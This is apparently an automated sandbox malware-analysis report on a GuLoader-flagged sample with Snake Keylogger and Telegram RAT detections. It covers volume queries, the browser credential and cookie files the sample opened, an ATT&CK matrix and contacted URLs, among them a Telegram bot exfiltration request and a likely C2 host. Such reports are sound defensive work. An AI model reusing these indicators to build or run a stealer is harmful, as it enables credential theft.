Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\cqWZtEH4eJ.exe

0_2_00403325

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000004.00000002.2609054481.0000000022A81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: msiexec.exe PID: 856, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior

Source: Yara match

File source: Process Memory Space: msiexec.exe PID: 856, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000004.00000002.2609054481.0000000022A81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: msiexec.exe PID: 856, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	2 Obfuscated Files or Information	1 OS Credential Dumping	3 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 PowerShell	Boot or Logon Initialization Scripts	1 Access Token Manipulation	1 Software Packing	LSASS Memory	14 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	311 Process Injection	1 DLL Side-Loading	Security Account Manager	211 Security Software Discovery	SMB/Windows Admin Shares	1 Clipboard Data	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Masquerading	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	131 Virtualization/Sandbox Evasion	LSA Secrets	131 Virtualization/Sandbox Evasion	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Access Token Manipulation	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	311 Process Injection	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
cqWZtEH4eJ.exe	70%	Virustotal		Browse
cqWZtEH4eJ.exe	58%	ReversingLabs	Win32.Trojan.GuLoader
cqWZtEH4eJ.exe	100%	Avira	TR/Injector.optgl

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Nino\cqWZtEH4eJ.exe	100%	Avira	TR/Injector.optgl
C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Nino\cqWZtEH4eJ.exe	58%	ReversingLabs	Win32.Trojan.GuLoader
C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Nino\cqWZtEH4eJ.exe	70%	Virustotal		Browse

Name	IP	Active	Malicious	Reputation
drive.google.com	142.250.181.238	true	false	high
drive.usercontent.google.com	142.250.184.225	true	false	high
reallyfreegeoip.org	104.21.16.1	true	false	high
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	132.226.8.169	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://reallyfreegeoip.org/xml/8.46.123.189	false	high
http://checkip.dyndns.org/	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:928100%0D%0ADate%20and%20Time:%2009/03/2025%20/%2001:46:10%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20928100%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://duckduckgo.com/ac/?q=	msiexec.exe, 00000004.00000002.2611051313.0000000023D5C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.office.com/T	msiexec.exe, 00000004.00000002.2609054481.0000000022C3F000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org	msiexec.exe, 00000004.00000002.2609054481.0000000022B62000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot	msiexec.exe, 00000004.00000002.2609054481.0000000022B62000.00000004.00000800.00020000.00000000.sdmp	false	high
http://crl.microsoft	powershell.exe, 00000002.00000002.1751274102.000000000807B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1742599713.0000000006EAD000.00000004.00000020.00020000.00000000.sdmp	false	high
https://drive.usercontent.google.com/Wa	msiexec.exe, 00000004.00000002.2594583004.0000000007072000.00000004.00000020.00020000.00000000.sdmp	false	high
https://contoso.com/License	powershell.exe, 00000002.00000002.1740283759.0000000005837000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.office.com/lB	msiexec.exe, 00000004.00000002.2609054481.0000000022C3A000.00000004.00000800.00020000.00000000.sdmp	false	high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	msiexec.exe, 00000004.00000002.2611051313.0000000023BD5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2611051313.0000000023D96000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2611051313.0000000023D5C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://chrome.google.com/webstore?hl=en	msiexec.exe, 00000004.00000002.2609054481.0000000022C0E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2609054481.0000000022C3F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2609054481.0000000022BFF000.00000004.00000800.00020000.00000000.sdmp	false	high
http://varders.kozow.com:8081	msiexec.exe, 00000004.00000002.2609054481.0000000022A81000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.google.com	msiexec.exe, 00000004.00000003.1800996824.0000000007079000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.1801091412.00000000070AE000.00000004.00000020.00020000.00000000.sdmp	false	high
https://www.google.com/images/branding/product/ico/googleg_alldp.ico	msiexec.exe, 00000004.00000002.2611051313.0000000023BD5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2611051313.0000000023D96000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2611051313.0000000023D5C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://aka.ms/pscore6lB	powershell.exe, 00000002.00000002.1736319849.00000000047D1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://drive.google.com/	msiexec.exe, 00000004.00000002.2594583004.0000000006FFA000.00000004.00000020.00020000.00000000.sdmp	false	high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	msiexec.exe, 00000004.00000002.2611051313.0000000023BD5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2611051313.0000000023D96000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2611051313.0000000023D5C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/	powershell.exe, 00000002.00000002.1740283759.0000000005837000.00000004.00000800.00020000.00000000.sdmp	false	high
